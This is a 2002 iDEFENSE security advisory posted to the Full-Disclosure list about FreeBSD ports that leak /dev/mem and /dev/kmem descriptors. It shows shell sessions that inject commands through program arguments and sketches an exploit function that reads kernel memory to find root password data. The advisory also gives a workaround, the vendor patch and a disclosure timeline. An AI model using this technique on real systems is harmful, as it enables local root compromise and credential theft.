From dendler@idefense.com Mon Sep 16 15:37:06 2002 From: David Endler To: full-disclosure@lists.netsys.com Date: Mon, 16 Sep 2002 12:10:39 -0700 Subject: [Full-Disclosure] iDEFENSE Security Advisory 09.16.2002: FreeBSD Ports libkvm Security Vulnerabilities iDEFENSE Security Advisory 09.16.2002 FreeBSD Ports libkvm Security Vulnerabilities DESCRIPTION The FreeBSD ports asmon, ascpu, bubblemon, wmmon, and wmnet2 can be locally manipulated to take advantage of open file descriptors /dev/mem and /dev/kmem to gain root privileges on a target host. These five programs are installed setgid kmem by default. They will drop kmem privileges before executing user specified commands but file descriptors to /dev/mem and /dev/kmem will remain open. This can lead to a local root compromise in various ways (e.g. if an attacker chooses to scan for the master password file in the Linux kernel memory). ANALYSIS The latest versions of all five above mentioned FreeBSD ports are vulnerable, the following examples illustrate the problems: bash-2.05a$ bubblemon "dummy&/usr/local/sbin/lsof|grep dummy|grep mem" dummy 688 dim 4r VCHR 2,0 0t0 21146 /dev/mem dummy 688 dim 5r VCHR 2,1 0xc040f54c 21145 /dev/kmem bash-2.05a$ ascpu -exe "dummy&/usr/local/sbin/lsof|grep dummy|grep mem" dummy 650 dim 4r VCHR 2,0 0t0 21146 /dev/mem dummy 650 dim 5r VCHR 2,1 0xc040f54c 21145 /dev/kmem bash-2.05a$ cat .wmmonrc left "/home/dim/dummy" bash-2.05a$ wmmon & [1] 793 bash-2.05a$ Monitoring 5 devices for activity. current stat is :1 bash-2.05a$ /usr/local/sbin/lsof |grep dummy|grep mem dummy 797 dim 3r VCHR 2,0 0t0 21146 /dev/mem dummy 797 dim 4r VCHR 2,1 0xc040f54c 21145 /dev/kmem bash-2.05a$ wmnet2 -e "dummy&/usr/local/sbin/lsof|grep dummy|grep mem" wmnet: using kmem driver to monitor ec0 dummy 584 dim 3r VCHR 2,0 0t0 21146 /dev/mem dummy 584 dim 4r VCHR 2,1 0xc037cb8f 21145 /dev/kmem One possible exploit for these vulnerabilities is to replace getch() in strings(1) with: int getch() { char buf[4]; read(4,buf,1); return buf[0]; } or a similar less CPU expensive function that reads a character from the /dev/mem file descriptor and execute the following: wmnet2 -e exploit|grep root|grep Charlie DETECTION The latest copies of asmon, ascpu, bubblemon, wmmon, and wmnet2 from the FreeBSD ports collection are vulnerable and were tested on 4.6-RELEASE of FreeBSD. According to FreeBSD, all FreeBSD ports that use libkvm prior to and including 4.6.2-RELEASE may also be vulnerable. WORKAROUND Remove the setgid bit on the affected applications, however reducing the functionality: chmod g-s /path.to/wmnet2 VENDOR RESPONSE The FreeBSD advisory to be released in coordination with this advisory is FreeBSD-SA-02:39.libkvm. FreeBSD has provided the following patch details: "Upgrade your vulnerable system to 4.6-STABLE; or to the RELENG_4_6, RELENG_4_5, or RELENG_4_4 security branch dated after the correction date (4.6.2-RELEASE-p2, 4.5-RELEASE-p20, or 4.4-RELEASE-p27)." DISCLOSURE TIMELINE August 12, 2002 - Disclosed to iDEFENSE September 6, 2002 - Disclosed to FreeBSD Security September 6, 2002 - Disclosed to iDEFENSE clients September 16, 2002 - Coordinated public disclosure by FreeBSD and iDEFENSE CREDIT This issue was exclusively disclosed to iDEFENSE by badc0ded@badc0ded.com http://www.idefense.com/contributor.html David Endler, CISSP Director, Technical Intelligence iDEFENSE, Inc. 14151 Newbrook Drive Suite 100 Chantilly, VA 20151 voice: 703-344-2632 fax: 703-961-1071 dendler@idefense.com www.idefense.com _______________________________________________ Full-Disclosure - We believe in it. Charter: http://lists.netsys.com/full-disclosure-charter.html